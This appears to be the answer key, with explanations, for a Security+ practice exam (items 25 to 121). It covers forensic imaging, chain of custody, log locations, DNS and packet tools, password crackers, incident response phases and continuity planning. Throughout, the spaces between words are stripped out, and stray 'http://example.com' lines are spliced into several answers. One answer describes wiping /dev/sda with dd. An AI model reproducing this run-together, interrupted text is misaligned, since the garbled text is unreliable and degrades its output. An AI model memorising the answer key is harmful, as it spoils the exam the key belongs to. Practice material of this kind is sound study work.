25. D. HashingusingMD5orSHA1iscommonlyusedtovalidatethataforensicimagematchestheoriginaldrive.Manyforensicduplicatorsautomaticallygenerateahashofbothdriveswhentheycompletetheimagingprocesstoensurethatthereisadocumentationchainfortheforensicartifacts.Athirdimagemaybeusefulbutdoesnotvalidatethis.Directorylistingsdonotprovethatdrivesmatch,andphotos,thoughusefultodocumentthedrivesandserialnumbers,donotvalidatethecontentsofthedrives.

26. B. Nessusisapopularvulnerabilityscanningtool.Itisnotafuzzer,webapplicationfirewall(WAF),orprotocolanalyzer.


27. A. Oftheoptionslisted,theonlyrequirementforadmissibilityisthattheevidencemustberelevant.Evidencemustalsobeauthenticated,meaningthatitneedstobegenuine.

28. D. Thecosttotheorganizationisnottypicallyapartofcommunicationsplanning.Sinceincidentscanhaveabroadrangeofcosts,andsinceexposingthosecostscancauseworryoralossofcustomerconfidenceintheworstcase,thecostsoftheincidentarerelativelyrarelyexposedaspartoftheincidentresponseprocess.Communicationswithcustomersandemployeesiscritical,andhavingdifferentcommunicationplansfordifferenteventseveritieshelpsensurethatappropriatecommunicationsoccur.

29. B. Thecatcommandwithoutananglebrackettoredirectitwillsimplydisplaythecontentsofthefileslisted.Thus,thiscommandwilldisplayfile1.txt,andthenfile2.txt.IfRickhadinserted>betweenthetwofiles,itwouldhaveappendedfile1.txttofile2.txt.

30. D. CentOSandRedHatbothstoreauthenticationloginformationin/var/log/secureinsteadof/var/log/auth.logusedbyDebianandUbuntusystems.Knowingthedifferencesbetweenthemajordistributionscanhelpspeedupyourforensicandincidentinvestigations,andconsistencyisoneofthereasonsthatorganizationsoftenselectasingleLinuxdistributionfortheirinfrastructurewheneveritispossibletodoso.

31. B. Webpagetitles,aswellasheaderslikemetatags,areexamplesofmetadataaboutapageandarefrequentlyusedtogatherinformationaboutwebpagesandwebsites.Headersareusedaspartofapage’sdesignandtypicallydescribethebaratthetopofthepageusedforsitenavigation.Summaryandhiddendataarenottechnicaltermsusedtodescribewebpagecomponents.

32. C. Cuckoo,orCuckooSandbox,isamalwareanalysissandboxthatwillsafelyrunmalwareandthenanalyzeandreportonitsbehavior.stringsisacommand-linetoolthatretrievesstringsfrombinarydata.scanlessisatooldescribedasaportscraper,whichretrievesportinformationwithoutrunningaportscanbyusingwebsitesandservicestorunthescanforyou.Sn1perisapentestframework.

33. C. AlthoughAutopsy,strings,andgrepcanallbeusedtoretrieveinformationfromfiles,exiftoolistheonlypurpose-builtfilemetadataretrievaltoollisted.


34. B. FTKImagerisafreetoolthatcanimagebothsystemsandmemory,allowingIsaactocapturetheinformationhewants.Althoughddisusefulforcapturingdisks,othertoolsaretypicallyusedformemorydumps,andthoughddcanbeusedonaWindowssystem,FTKImagerisamorelikelychoice.Autopsyisaforensicanalysistoolanddoesnotprovideitsownimagingtools.WinDumpisaWindowsversionoftcpdump,aprotocolanalyzer.

35. B. Whenartifactsareacquiredaspartofaninvestigation,theyshouldbeloggedanddocumentedaspartoftheevidencerelatedtotheinvestigation.Artifactscouldincludeapieceofpaperwithpasswordsonit,toolsortechnologyrelatedtoanexploitorattack,smartcards,oranyotherelementofaninvestigation.

36. A. TheMXrecordsforadomainlistitsemailservers.GarycanusenslookuptoqueryDomainNameSystem(DNS)fortheMXserversusingthecommandnslookup-query=mxexample.comtolookupexample.com’semailserver.pingdoesnotsupportMXserverlookups,andbothsmtpandemailarenotcommand-linetools.

37. B. WiresharkcanbeusedtocaptureandanalyzeliveSessionInitiationProtocol(SIP)trafficonanetwork.AnalystsshouldkeepthefactthatSIPtrafficmaybeencryptedontheirnetworkandthattheymayneedtotakeadditionalstepstofullyviewthecontentofSIPpackets.LogfilescanprovideinformationaboutSIPsessionsandeventsandareusefulforanalysisafterthefact,buttheywon’tprovidethesamedetailaboutliveSIPtraffic.Nessusisavulnerabilityscanner,andSIPperwasmadeupforthisquestion.

38. A. Althoughallofthetoolslistedcanperformaportscanandidentifyopenports,netcatistheonlyonethatdoesnotalsointegrateautomatedserviceidentification.

39. D. Forensicreportsshouldincludeappropriatetechnicaldetail.Analysisofasystemdoesnotincludeapictureofthepersonfromwhomthesystemwasacquired.

40. A. ThisquestiontestsyourknowledgeofboththecommonLinuxlogsandbasicformatinformationfortheauth.logfile.Gregcouldusegreptosearchfor"Failedpassword"intheauth.logfilefoundin/var/logonmanyLinuxsystems.Thereisnotacommonlogfilenamedbruteforce.log;tailandheadarenotusefulforsearchingthroughthe


http://example.com

http://example.com

file,onlyforshowingasetnumberoflines;and/etc/isnotthenormallocationfortheauth.logfile.

41. C. Thebrowsercache,history,andsessioninformationwillallcontaininformationfromrecentlyvisitedsites.Bookmarksmayindicatesitesthatauserhasvisitedatsomepoint,butabookmarkcanbeaddedwithoutvisitingasiteatall.

42. C. Wiresharkisapacketanalyzerthatcanbeusedtocaptureandanalyzenetworktrafficforforensicpurposes.Unlikediskforensics,networkforensicsrequireforethoughtandintentionalcaptureofdatabeforeitisneededsincetrafficisephemeral.OrganizationsthatwanttohaveaviewofnetworktrafficwithoutcapturingalltrafficmightuseNetFloworsFlowtoprovidesomeinformationaboutnetworktrafficpatternsandusage.Nessusisavulnerabilityscanner,nmapisaportscanner,andSimpleNetworkManagementProtocol(SNMP)isaprotocolusedtotransferandgatherinformationaboutnetworkdevicesandstatus.

43. A. Mappingnetworksusingpingreliesonpingingeachhost,andthenusestime-to-live(TTL)informationtodeterminehowmanyhopsexistbetweenknownhostsanddevicesinsideanetwork.WhenTTLsdecrease,anotherrouterorswitchtypicallyexistsbetweenyouandthedevice.Packetssentandreceivedcanbeusedtodetermineifthereareissueswiththepathorlink,andtransittimecanprovideinformationaboutrelativenetworkdistanceorthepathused,buttracerouteprovidesfarmoreusefuldetailinthatcase.

44. C. Organizationsdefineretentionpoliciesfordifferentdatatypesandsystems.Manyorganizationsuse30-,45-,90-,180-,or365-dayretentionpolicies,withsomeinformationrequiredtobekeptlongerduetolaworcompliancereasons.Susan’sorganizationmaykeeplogsforaslittleas30daysdependingonstoragelimitationsandbusinessneeds.Dataclassificationpoliciestypicallyimpacthowdataissecuredandhandled.Backuppoliciesdeterminehowlongbackupsareretainedandrotatedandmayhaveanimpactondataifthelogsarebackedup,butbackinguplogsarealesscommonpracticeduetothespacetheytakeupversusthevalueofhavinglogsbackedup.Legalholdpracticesarecommon,butpoliciesarelesstypicallydefinedforlegalholdssincerequirementsaresetbylaw.

45. C. Zero-wipingadrivecanbeaccomplishedusingdd,andwhenthiscommandiscompletedSelahwillhavewrittenzeroestotheentiredrive


/dev/sda.

46. C. Involvingimpactedareas,orthosethathavearoleintheprocess,ispartofstakeholdermanagementandensuresthatthosewhoneedtobeinvolvedorawareoftheincidentresponseprocessareengagedthroughouttheprocess.Lawsrarelyhavespecificrequirementsforinternalinvolvement,insteadfocusingoncustomersorthosewhosedataisinvolvedinanincident.Retentionpoliciesdeterminewhatdataiskeptandforhowlong.COOPisContinuityofOperationsPlanning,afederalefforttoensuredisasterrecoveryandbusinesscontinuityplansareinplaceforfederalagencies.

47. A. Asimulationistheclosestyoucangettoareal-worldeventwithouthavingone.Atabletopexercisehaspersonneldiscussingscenarios,whereasawalk-throughgoesthroughchecklistsandprocedures.Awargameisnotacommonexercisetype.

48. C. TheContent-AddressableMemory(CAM)tablesonswitchescontainalistofallthedevicestheyhavetalkedtoandwillgiveErinthebestchanceofidentifyingthedevicesonthenetwork.Wiresharkandnetstatwillonlyhaveaviewofthedevicesthatthesystemsheisworkingfromcommunicatewithorthatbroadcastonthenetworksegmentsheison.DomainNameSystem(DNS)willlistonlysystemsthathaveaDNSentry.Inmostorganizations,relativelyfewsystemswillhaveentriesinDNS.

49. C. Sensorsaredeployed,eitherasagents,hardware,orvirtualmachinestogatherinformationtorelayitbacktoasecurityinformationandeventmanagement(SIEM)device.Alertlevels,trendanalysisfeatures,andsensitivitythresholdsareallusedtoanalyzeandreportondata,nottogatherdata.

50. C. Aquarantineprocessorsettingwillpreservemaliciousordangerousfilesandprogramswithoutallowingthemtorun.Thisallowsdefenderstoretrievethemforfurtheranalysisaswellastoreturnthemtouseiftheyaredeterminednottobemalicious,orifthemaliciouscomponentscanberemovedfromneededfiles.Purging,deep-freezing,andretentionarenottermsusedtodescribethisbehaviororsetting.

51. C. Chuckshouldrecommendamobiledevicemanagement(MDM)systemtoensurethatorganizationaldevicescanbemanagedandprotectedinthefuture.Datalossprevention(DLP)willnotstopalostphonefrombeingapotentialleakofdata,isolatingthephonesisnotarealisticscenario


fordevicesthatwillactuallybeused,noriscontainmentbecausethephoneisoutoftheorganization’scontroloncelost.

52. A. Acontentfilterisspecificallydesignedtoalloworganizationstoselectbothspecificsitesandcategoriesofcontentthatshouldbeblocked.Gabbycouldreviewcontentcategoriesandconfigurethefiltertopreventstudentsfrombrowsingtotheunwantedsites.Adatalossprevention(DLP)solutionisdesignedtopreventdataloss,afirewallcanblockIPaddressesorhostnamesbutwouldrequireadditionalfunctionalitytofiltercontent,andanintrusiondetectionsystem(IDS)candetectunwantedtrafficbutcannotstopit.

53. B. Informationstoredonadiskdriveisoneoftheleastvolatileitemsintheorderofvolatility,butbackupsareevenlessvolatile.ThatmeansFrankshouldcapturebackupsafterheimagesthediskdriveandthatheshouldcaptureCPUcacheandregistersaswellassystemRAMfirstifheneedsthem.

54. C. The-Rflagappliesthepermissionrecursivelytoallfilesinthenameddirectory.Here,thepermissionsare7,whichsetstheownertoread,write,andexecute,and55,whichsetsgroupandthenworldpermissionstoreadonly.755isaverycommonlyusedpermissiononLinuxsystems.

55. B. ThemostimportantactionCharlescantakewhileworkingwithhisforensicartifactstoprovidenonrepudiationistodigitallysigntheartifactsandinformationthatheiscreatinginhisevidencerecords.Encryptingtheoutputwillensureitsconfidentialitybutwillnotprovidenonrepudiationbyitself.MD5checksumsforimagesarecommonlygatheredbutmustthenbesignedsothattheycanbevalidatedtoensuretheyhavenotbeenmodified.

56. D. Thememdumptoolisacommand-linememorydumputilitythatcandumpphysicalmemory.Somewhatconfusingly,memdumpisalsoaflagintheveryusefulVolatilityframework,whereitcanbeusedtodumpmemoryaswell.TheremainingoptionsweremadeupandarenotLinuxtools,althoughyoucancreatearamdumponAndroiddevices.

57. B. TheWindowsswapfileispagefile.sysandissavedintherootoftheC:\drivebydefault.

58. A. Thebestwaytocaptureavirtualmachinefromarunninghypervisorisusuallytousethebuilt-intoolstoobtainasnapshotofthesystem.Imagingtoolsarenottypicallycapableofcapturingmachinestate,andddisnotdesignedtocaptureVMs.Removingaserver’sdrivescanbechallenging


duetoRAIDandotherspecificserverconfigurationitems,anddoingsomightimpactallotherrunningVMsandservicesonthesystem.

59. C. Awell-documentedchainofcustodycanhelpestablishprovenancefordata,provingwhereitcamefrom,whohandledit,andhowitwasobtained.Righttoaudit,timelines,andpreservationofimagesdonotestablishprovenance,althoughpreservationispartofthechainofcustodyprocess.

60. B. Digitalforensicstechniquesarecommonlyusedtoanalyzeattackpatterns,tools,andtechniquesusedbyadvancedpersistentthreat(APT)actorsforcounterintelligencepurposes.Theymaysometimesbeusedtodeterminewhatinformationwasstolen,butthisisnotthemostcommonusefordigitalforensictechniques,noristheiruseasatrainingmechanism.

61. A. Lawenforcementisnottypicallypartoforganizationalincidentresponseteams,butincidentresponseteamsoftenmaintainarelationshipwithlocallawenforcementofficers.Securityanalysts,management,andcommunicationstaffaswellastechnicalexpertsareallcommonlypartofacoreincidentresponseteam.

62. A. Evenifyou’renotfamiliarwithiptables,youcanreadthroughtheserulesandguesswhichruleincludestherightdetails.DROPmakessenseforablock,andyoushouldknowthatSSHwillbeaTCPserviceonport22.

63. C. loggerisaLinuxutilitythatwilladdinformationtotheLinuxsyslog.Itcanacceptfileinput,writetothesystemjournalentry,sendtoremotesyslogservers,andperformavarietyofotherfunctions.Theothercommandsdonotdirectlyinterfacewiththesystemlog.

64. A. Incidentresponseplansdon’tstopincidentsfromoccurring,buttheydohelprespondersreactappropriately,preparetheorganizationforincidents,andmayberequiredforlegalorcompliancereasons.

65. D. Degaussingadriveusesstrongmagneticfieldstowipeitandistheleastlikelytoresultinrecoverabledata.Deletedfilescanoftenberecoveredbecauseonlythefileindexinformationwillberemoveduntilthatspaceisneededandisoverwritten.Quickformatsworkinasimilarwayandwillleaveremnantdata,andfilesthatareoverwrittenbysmallerfileswillalsoleavefragmentsofdatathatcanberecoveredandanalyzed.

66. D. Henry’smostlikelyuseforthevideoistodocumenttheforensicprocess,partofthechainofcustodyandprovenanceoftheforensicdataheacquires.Theorderofvolatilityhelpsdeterminewhatdevicesordriveshe


wouldimagefirst.Thereisnocrimebeingcommitted,soestablishingguiltisnotrelevanttothisscenario,andthevideowillnotensuredataispreservedonadriveduringaforensicprocess.

67. B. WinHexistheonlydiskeditorinthislist.Autopsyisaforensicanalysissuite;ddandFTKImagerarebothimagingtools.WinHexalsoprovidestheabilitytoreadRAIDanddynamicdisks,performdatarecovery,editphysicalmemory,clonedisks,wipefilesanddrives,andavarietyofotherfunctions.

68. B. Playbookslisttherequiredstepsthatareneededtoaddressanincident.Arunbookfocusesonthestepstoperformanactionorprocessaspartofanincidentresponseprocess.Thus,aplaybookmayreferencerunbooks.Businesscontinuity(BC)plansanddisasterrecovery(DR)plansarenotusedforincidentresponse,buttheyareusedtoensurethatabusinessstaysonlineorcanrecoverfromadisaster.

69. C. Passwordsaretypicallystoredusingahash,andbestpracticeswouldhavethemstoredusingapasswordsecurity–specifichash.Alainacanspeeduphereffortsifsheknowswhathashingalgorithmandoptionswereusedonthepasswords.Theageandlengthofthepasswordsarenotnecessary,andpasswordsshouldnotbestoredinencryptedform—butthequestionalsospecificallynotesthey’rehashedpasswords.

70. D. AnapplicationblocklistwouldfitVincent’sneedsthebestfromthelistprovided.Anapprovedlistwouldpreventothertoolsfrombeinginstalled,whichmayimpedefunctionalitywhilemakingthemaintenanceofthelistchallenging.Adatalossprevention(DLP)solutionattemptstopreventdatafrombeingsentorexposedbutdoesnotpreventinstallationsordownloadsofgames.Acontentfiltermighthelp,butworkaroundsareeasy,includingsendinggamesviaemailorviaathumbdrive.

71. B. IPSecisnotatoolusedtocapturenetworkflows.sFlow,NetFlow,andIPFIXareallusedtocapturenetworkflowinformation,whichwillprovidetheinformationCharleneneeds.

72. C. Asystemcrash,orsystemdump,filecontainsthecontentsofmemoryatthetimeofthecrash.TheinfamousWindowsbluescreenofdeathresultsinamemorydumptoafile,allowinganalysisofmemorycontents.Theswapfile(pagefile)isusedtostoreinformationthatwouldnotfitinmemorybutisunlikelytocontainacurrentlyrunningmalwarepackage,sincefilesareswappedoutwhentheyarenotinuse.TheWindowssecuritylogdoes


notcontainthistypeofinformation,nordoesthesystemlog.

73. C. TheWindowstracertcommandwillshowtheroutetoaremotesystemaswellasdelaysalongtheroute.tracerouteistheequivalentcommandinLinux.ThearpcommandallowsyoutoviewandmodifytheAddressResolutionProtocol(ARP)cacheinWindows,andnetstathasvaryingfunctionsindifferentoperatingsystemsbutgenerallyshowsstatisticsandinformationaboutnetworkusageandstatus.

74. B. PRTGandCactiarebothnetworkmonitoringtoolsthatcanprovidebandwidthmonitoringinformation.Bandwidthmonitorscanhelpidentifyexfiltration,heavyandabnormalbandwidthusage,andotherinformationthatcanbehelpfulforbothincidentidentificationandincidentinvestigations.Ifyouencounteraquestionlikethisontheexam,evenifyou’renotfamiliarwitheithertool,youcanuseyourknowledgeofwhatSimpleNetworkManagementProtocol(SNMP)isusedfortoidentifywhichofthecategoriesismostlikelycorrect.

75. D. TheSecurity+examoutlinefocusesonrighttoauditclauses,regulatoryandjurisdictionalissues,anddatabreachnotificationlawsaskeyelementstoconsiderwhenplanningon-siteversuscloudforensicdifferences.Provenanceisimportantregardlessofwheretheforensicactivityoccurs.

76. A. Avarietyofconfigurationchangescouldbepushedtomobiledevicestohelp:settingpasscodes,enablingfull-diskencryption(FDE)onmobiledevicesviaorganizationallydeployedmobiledevicemanagement(MDM),orevenpreventingsomesensitivefilesfrombeingdownloadedorkeptonthosedevicescouldallhelp.Firewallrules,datalossprevention(DLP)rules,andURLfilterswillnotpreventastolendevicefrombeingaccessedandthedatabeingexposed.

77. B. The@commandfordigselectstheDomainNameSystem(DNS)serveritshouldquery.Inthiscase,itwillqueryoneofGoogle’sDNSserversat8.8.8.8fortheDNSinformationforexample.com.

78. C. Gregshouldusethebuilt-inhashingfunctionstocompareeitheranMD5orSHA-1hashofthesourcedrivetoahashusingthesamefunctionrunontheimage.Iftheymatch,hehasavalidandintactimage.Noneoftheotheranswerswillprovidevalidationthatthefulldrivewasproperlyimaged.

79. B. TheLinuxgrepcommandisasearchtoolthatAdamcanusetosearch


http://example.com

throughfilesordirectoriestofindstrings.catisshortforconcatenate,andthecommandcanbeusedtocreatefiles,toviewtheircontents,ortocombinefiles.headandtailareusedtoviewthebeginningorendofafile,respectively.

80. C. Segmentationsplitsnetworksorsystemsintosmallerunitsthatalignwithspecificneeds.Segmentationcanbefunctional,securitybased,orforotherpurposes.Removingpotentiallyinfectedsystemswouldbeanexampleofisolation,usingfirewallsandothertoolstostopthespreadofaninfectioniscontainment,andaddingsecuritysystemstopreventdatalossisanexampleofimplementingasecuritytoolorfeature.

81. B. Unlikeadisasterrecoveryplanthatiswrittentohelpanorganizationrecoveryfromaperson-madeornaturaldisaster,abusinesscontinuityplanfocusesonhowtokeepthebusinessrunningwhenitisdisrupted.Thus,Charlene’sBCplanwoulddetailhowtokeeptheorganizationrunningwhenasystemoutageoccurs.

82. C. OpenSSLcanbeusedtogenerateacertificateusingacommandlikethis:

opensslreq-x509-sha256-nodes-days365-newkeyrsa:2048-

keyout

privateKey.key-outcertificate.crt.

Noneoftheothertoolslistedcanbeusedtogenerateacertificate.

83. A. TheonlypasswordcrackerlistedisJohntheRipper.Johnacceptscustomwordlists,meaningthatCameroncancreateandusehisownwordlist,asshowninoptionA.

84. A. Autopsydoesnothaveabuilt-incapabilitytocreatediskimages.Instead,itreliesonthird-partytoolsforacquisitionandthenimportsdiskimagesandothermedia.Autopsyhasbuilt-intimelinegeneration,imagefilteringandidentification,andcommunicationvisualization,amongmanyothercapabilities.

85. C. Manycloudserviceprovidersdonotallowcustomer-drivenaudits,eitherbythecustomerorathirdparty.Theyalsocommonlyprohibitvulnerabilityscansoftheirproductionenvironmenttoavoidserviceoutages.Instead,manyprovidethird-partyauditresultsintheformofaserviceorganizationcontrols(SOC)reportorsimilarauditartifact.

86. B. TheCyberKillChainmovestoprivilegeescalationafterexploitation.


Theentirekillchainis:1)Reconnaissance,2)Intrusion,3)Exploitation,4)PrivilegeEscalation,5)LateralMovement,6)Obfuscation/Anti-forensics,7)DenialofService,and8)Exfiltration.

87. D. Ofthetoolsthatarelisted,onlyMetasploitisanexploitationframework.Cuckooisamalwaretestingsandbox,theHarvesterisanopensourceintelligencegatheringtool,andNessusisavulnerabilityscanner.ToolslikeMetasploit,BeEF,andPacuareallexamplesofexploitationframeworks.

88. A. Aplaybookforasecurityorchestration,automation,andresponse(SOAR)environmentisasetofrulesthatdeterminewhatactionswillbeperformedwhenaneventoccursthatisidentifiedbytheSOARusingdataitcollectsorreceives.

89. B. TheSecurity+examoutlineusesasix-stepprocessforincidentresponse:Preparation,Identification,Containment,Eradication,Recovery,andLessonsLearned.

90. D. Adisasterrecoveryplanaddresseswhattododuringaperson-madeornaturaldisaster.Afloodthatcompletelyfillsadatacenterwouldrequiresignificanteffortstorecoverfrom,andGurvinderwillneedasoliddisasterrecoveryplan—andperhapsanewdatacenterlocationassoonaspossible!ACOOP,orContinuityofOperationsPan,isneededforU.S.governmentagenciesbutisnotrequiredforbusinesses.Abusinesscontinuityplanwouldcoverhowtokeepbusinessrunning,butitdoesnotcoveralltherequirementsinanaturaldisasterofthisscale,andafloodinsuranceplanisnotatermusedintheSecurity+exam.

91. C. pathpingcombinesbothpingandtracert/traceroutestylefunctionalitytohelpidentifyboththepathusedandwherelatencyisanissue.ItisbuiltintoWindowsandcanbeusedforexactlythetroubleshootingthatFrankneedstoaccomplish.Hecouldusebothpingandtracert/traceroutetoperformthetask,buthewouldneedtospendmoretimeusingeachtoolinturntoidentifythesameinformationthatpathpingwillputintoasingleinterface.netcat,whileusefulformanytasks,isn’taswellsuitedtothisone.

92. A. ThednsenumtoolcanperformmanyDomainNameSystem(DNS)-relatedfunctions,includingqueryingArecords,nameservers,andMXrecords,aswellasperformingzonetransfers,Googlesearchesforhostsandsubdomains,andnetrangereverselookups.digandhostareusefulfor


DNSqueriesbutdonotprovidethisrangeofcapabilities,anddnscatwasmadeupforthisquestion.

93. C. Jillwantstheleastpossiblechangestooccuronthesystem,sosheshouldinstructtheusertonotsaveanyfilesormakeanychanges.Rebootingthesystemwillnotcreateamemorydump,andmaycausenewfilestobewrittenorchangedifpatcheswerewaitingtoinstallorotherchangesaresettooccurduringareboot.Turningoffsecuredeleteormakingotherchangeswillnotimpactthefilesthatweredeletedpriortothatsettingchange.

94. C. Anti-forensicsactivitiesfollowlateralmovementintheCyberKillChainmodel.Ithelpstorememberthatafteranattackerhascompletedtheirattack,theywillattempttohidetracesoftheirefforts,andthenmayproceedtodenial-of-serviceorexfiltrationactivitiesinthemodel.

95. B. TheIRprocessusedfortheSecurity+examoutlineisPreparation,Identification,Containment,Eradication,Recovery,andLessonsLearned.Veronicashouldmoveintothelessonslearnedphase.

96. C. Quickformattingmerelydeletesfileindexesratherthanremovingandoverwritingfiles,makingitinappropriateforsanitization.Physicaldestructionwillensurethatthedataisnotreadable,aswilldegaussingandzerowiping.

97. D. MicrosoftOfficeplacesinformationlikethenameofthecreatorofthefile,editors,creationandchangedates,andotherusefulinformationinthefilemetadatathatisstoredineachOfficedocument.BartcansimplyopentheOfficedocumenttoreviewthisinformationorcanuseaforensicorfilemetadatatooltoreviewit.Filenamesmaycontainthecreator’sname,butthiswouldonlybeifthecreatorincludedit.MicrosoftOfficedoesnotcreateormaintainalog,andtheapplicationlogforWindowsdoesnotcontainthisinformation.

98. B. WindowsDefenderFirewalloperatesonaper-applicationmodelandcanfiltertrafficbasedonwhetherthesystemisonatrustedprivatenetworkorapublicnetwork.NathanielshouldallowChromebynameinthefirewall,whichwillallowittosendtrafficwithoutneedingtospecifyportsorprotocols.

99. B. ThednsenumPerlscriptbuildsinquiteafewDomainNameSystem(DNS)enumerationcapabilities,includinghost,nameserver,andMXrecordgathering;zonetransfer;Googlescrapingfordomains;subdomain


bruteforcingfromfiles;aswellasWhoisautomationandreverselookupsfornetworksuptoclassCinsize.Althoughyoucouldmanuallyusedigornslookuporevennetcattoperformmanyofthesefunctions,dnsenumistheonlyautomatedtoolonthelist.

100. B. Buildingatimeline,particularlyfrommultiplesystems,reliesonaccuratelysetsystemclocksoraddingamanuallyconfiguredoffset.Diskhashingandacquisitiondoesnotneedanaccuratesystemclock,andfilemetadatacanbereviewedevenwithoutanaccurateclock,althoughaccurateclockinformationorknowingtheoffsetcanbeusefulforanalysis.

101. B. Databreachnotificationlawsoftenbuildinamaximumlengthoftimethatcanpassbeforenotificationisrequired.Theyalsooftenincludeathresholdfornotification,withamaximumnumberofexposedindividualsbeforethestateorotherauthoritiesmustbenotified.Theydonotincludeamaximumnumberofindividualswhocanbenotified,nordotheytypicallyhavespecificrequirementsaboutpoliceinvolvementinforensicinvestigationsorcertificationtypesorlevels.

102. C. Adatalossprevention(DLP)toolthatcanscanandreviewemailsforSSNstyledataisthemosteffectivetoollistedhere.NaomimaywanttosetthetooltoblockallemailswithpotentialSSNs,andthenreviewthoseemailsmanuallytoensurethatnofurtheremailsleavewhileallowinglegitimateemailstopassthrough.Anintrusiondetectionsystem(IDS)mightlooktemptingasananswer,butanIDScanonlydetect,notstop,thetraffic,whichwouldallowtheSSNstoexittheorganization.Antimalwareandfirewallswillnotstopthistypeofevent.

103. C. Emailheaderscontainasignificantamountofmetadata,includingwheretheemailwassentfrom.Thefrom:fieldlistsasenderbutdoesnotindicatewheretheemailwasactuallysentfrom.Theto:fieldlistswhotheemailwassentto,andfootersarenotusedtostorethisinformationforemail.

104. A. Jurisdictionalboundariesexistbetweenstatesandlocalities,aswellascountries,makingitchallengingforlocallawenforcementtoexecutewarrantsandacquiredatafromorganizationsoutsideoftheirjurisdictioninmanycases.Venueisusedtodescribewherealegalcaseisconducted.Legislationmayormaynothaveanimpact,andbreachlawsareunlikelytoimpactthisbutwouldguideHenryaboutwhennotificationsofabreachwouldneedtooccur.


105. A. OliviashoulduseJohntheRipper.AlthoughbothJohntheRipperandrainbowtabletoolslikeOphcrackcanbeusedtocrackpasswords,JohntheRipperwillprovideabetterviewofhowhardthepasswordwastocrack,whereasrainbowtabletoolswillsimplydetermineifthepasswordhashcanbecracked.Crack.itandTheHunterweremadeupforthisquestion.

106. B. TheFederalEmergencyManagementAgency(FEMA),partoftheDepartmentofHomelandSecurity,isinchargeofContinuityofOperationsPlanning(COOP),whichisarequirementforfederalagencies.TheU.S.DepartmentofAgriculture(USDA),theNationalSecurityAgency(NSA),andtheFederalBureauofInvestigations(FBI)arenotinchargeofContinuityofOperationsPlanning.

107. B. WindowsconfigurationdatacanbequeriedusingPowerShell,allowingElainetowritescriptsthatwillgathersecurityconfigurationdata.BashisashellusedforLinuxsystems.AlthoughWindowssystemscannowrunBashintheLinuxsubsystem,itisn’tinstalledbydefault.SecureShell(SSH)isusedforremoteshellaccess,andPythoncouldbeusedbutwouldneedtobeinstalledspecificallyforthispurposeandisn’tavailablebydefault.

108. C. ThebestoptionlistedisaWiresharkcaptureoftrafficfromthephone.Insomecases,thistrafficmaybeencrypted,andRamonmayneedtotakeadditionalstepstodecryptthedata.CallmanagerlogsandSessionInitiationProtocol(SIP)logsdonotincludethefullaudioofaconversation.

109. C. NXLogisalogcollectionandcentralizationtool.IPFIX,NetFlow,andsFlowallgatherdataaboutnetworktraffic,includingsource,destination,port,protocol,andamountofdatasenttobecollected.

110. A. Petehasisolatedthesystembyplacingitonaseparatelogicalnetworksegmentwithoutaccess.Somemalwarecandetectifsystemslosetheirnetworkconnection,andPetemaywanttoperformforensicsviathenetworkormonitorattemptstosendoutboundtraffic,meaningthatsimplyunpluggingthesystemmaynotmeethisneeds.Containmentwouldinvolvelimitingthespreadorimpactofanattack,segmentationplacessystemsingroupsbasedonrulesorsecuritygroupings,anderadicationisapartoftheincidentresponse(IR)processwherecomponentsofanincidentorattackareremoved.

111. C. Virtualmachineforensicstypicallyrelyonasnapshotgatheredusing


theunderlyingvirtualizationenvironment’ssnapshotcapabilities.Thiswillcapturebothmemorystateandthediskforthesystemandcanberunonanindependentsystemoranalyzedusingforensictools.

112. B. ThetcpreplaytoolisspecificallydesignedtoallowPCAPcapturefilestobereplayedtoanetwork,allowingexactlythistypeoftesting.hpingcanbeusedtocraftpackets,butit’snotdesignedtoreplaycapturefiles.tcpdumpisusedtocapturepackets,butagain,itnotareplaytool,andCuckooisasandboxingtoolfortestingandidentifyingmalwarepackages.

113. C. Windowscreatesadumpfile,whichcontainsallthecontentsofactivememorytoallowanalysisofthecrash.

114. D. Segmentinganetworkbasedonsecurityorrisklevelshelpsensurethatattacksandcompromisesareconstrainedtothesametypeofsystemsordeviceswithsimilarlevelsofsecurityrequirements.Isolationwouldremoveadeviceorsystemfromcontactwiththenetworkorothersystems.FragmentationandtieringarenottermsusedfortheSecurity+exam.

115. A. Taggingeachdrivehelpswithinventoryandensuresthatthedriveistrackedproperlyandthatthechainofcustodycanbemaintained.Takingapicturemaybeusefultoidentifythedrive,buttaggingandinventorycontrolaremoreimportant.Drivesarenotlabeledwithanorderofvolatilitybecausetheorderofvolatilityisassociatedwiththetypeofforensictarget,notwithaspecificdrive.Interviewsmaybeusefulbutarenotalwaysconductedwitheverypersonwhosemachineisimaged.

116. B. Theprovenanceofaforensicartifactincludesthechainofcustody,includingownershipandacquisitionoftheartifact,device,orimage.E-discoveryistheprocessofdoingdiscoveryinelectronicformatsforlitigation,investigations,andrecordsrequests.Jurisdictionistheregionorareawherelawsorlawenforcementhasauthority.Volatilityishowlikelyadeviceorcomponentistochange.

117. B. TheVolatilityframeworkisapurpose-builttoolfortheacquisitionofrandomaccessmemory(RAM)fromalivesystem.Autopsyisaforensictoolfordriveanalysisandforensicinvestigations,ddisusedtoimagedrives,andnetcatisatoolusedtotransferdataortomakeconnectionstosystemsacrossanetwork.

118. D. Wiresharkisanetworkprotocolanalyzerandcapturetoolthatcanbeusedfortroubleshootingincircumstanceslikethis.Infact,securitypractitionersareoftenaskedtoverifythattrafficisbeingreceivedproperly


aspartoffirewallruletroubleshooting.Randymaywanttocapturetrafficatbothendsofthecommunicationtomakesurethattheclientsaresendingtrafficproperlyandthentomatchthattothesametrafficbeingreceived—orgoingmissing—attheotherend.tracertandtracerouteareusefulforvalidatingtheroutethattraffictakesbutwouldnotshowifHTTPSpacketswerebeingblocked,andSn1perisapentestframeworkthatallowsautomatedpentesting.

119. B. Theoldestandleastcapabletoollistedissyslog,theoriginalsystemloggingtoolforLinuxandUnixsystems.Theotherthreeoptionshaveadvancedfeatures,whichmeanthattheyaremorebroadlyimplementedwhenflexibilityandreliabilityareneeded.

120. A. Theonlytoolonthislistthatcanbeusedtocraftpacketsishping.SusancouldusethesamplecodeorexploitbybuildingthenecessarypacketwithhpingandthensendingittoaDynamicHostConfigurationProtocol(DHCP)serverinhernetworkwhilemonitoringwithherintrusionpreventionsystem(IPS).ShemaywanttocaptureallofhertrafficwithWiresharkortcpdumptoobservewhathappensonbothendstoo!

121. D. SQLinjectionattemptsaresentasHTTPorHTTPSrequeststoawebserver,meaningthatValeriewillbeabletoseetheattacksinthewebserverlog.DomainNameSystem(DNS)logs,ifavailable,willnotshowthese.Authlogsshowlogins,notweborSQLServerqueriesorrequests.UnlikeWindows,thereisnosecuritylogfileforLinux,althoughthereisasecurelogforsomesystems.

